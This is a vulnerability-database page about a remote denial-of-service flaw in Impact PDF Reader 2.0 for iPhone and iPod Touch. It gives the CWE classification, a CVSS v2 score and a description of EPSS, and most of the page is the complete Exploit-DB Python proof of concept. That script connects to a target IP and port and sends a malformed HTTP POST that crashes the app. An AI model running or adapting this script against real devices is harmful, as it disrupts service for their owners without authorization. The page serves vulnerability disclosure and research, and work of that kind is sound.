Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-20 |
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 13871
Publication date : 2010-06-13 22h00 +00:00
Author : Nishant Das Patnaik
EDB Verified : No
# Exploit: Impact PDF Reader v2.0 for iPhone/iPod Touch POST Method Remote DoS
# Date: 14/06/2010
# Author: Nishant Das Patnaik
# Website: http://nishantdaspatnaik.yolasite.com
# Software Link: http://itunes.apple.com/us/app/impact-pdf-reader/id322140783?mt=8*
# Version: 2.0, 1.2
# Tested on: iPod 2G with iOS v3.1.3
# Note: Impact PDF Reader v2.0 and prior program versions are also vulnerable.
#!/usr/bin/env python
import os
import sys
import socket
def main(argv):
argc = len(argv)
if argc != 3:
print "Usage: %s <target-ip> <target-port>" % (argv[0])
sys.exit(0)
host = argv[1]
port = int(argv[2])
print "[+] Connecting: %s:%d" % (host, port)
payload = "POST / HTTP/1.1\r\n"
payload += "Host: %s:%d\r\n" % (host, port)
payload += "Content-Length: 3\r\n\r\n"
payload += "..."
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.connect((host, port))
print "[+] Sending payload..."
print "[+] Did you see that b00m? ;) http://nishantdaspatnaik.yolasite.com"
sd.send(payload)
sd.close()
if __name__ == "__main__":
main(sys.argv)
sys.exit(0)
Products Mentioned
Configuraton 0
Impactfinancials>>Impact_pdf_reader >> Version 1.2
Impactfinancials>>Impact_pdf_reader >> Version 2.0
Apple>>Iphone_os >> Version 3.1.3
Apple>>Iphone_os >> Version 3.1.3
References